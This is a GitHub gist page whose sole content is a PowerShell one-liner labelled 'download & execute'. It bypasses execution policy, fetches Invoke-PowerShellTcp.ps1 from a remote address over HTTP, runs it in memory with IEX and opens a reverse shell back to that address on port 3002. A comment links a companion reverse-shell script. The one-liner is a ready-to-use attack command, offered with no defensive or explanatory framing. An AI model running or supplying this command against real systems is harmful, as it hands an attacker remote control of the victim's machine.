Skip to content

Instantly share code, notes, and snippets.

@intrd
Last active November 19, 2021 12:29
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save intrd/feec7171aa7d172742b330f1f77f3edf to your computer and use it in GitHub Desktop.
Save intrd/feec7171aa7d172742b330f1f77f3edf to your computer and use it in GitHub Desktop.
Powershell download & execute (anyver)
# Powershell download & execute (anyver)
# http://dann.com.br/
# Invoke-PowerShellTcp.ps1 (Reverse powershell) - https://gist.github.com/intrd/d5086206bdef0ba1d7776c5325547626
powershell.exe -NoProfile -ExecutionPolicy unrestricted -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3002
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment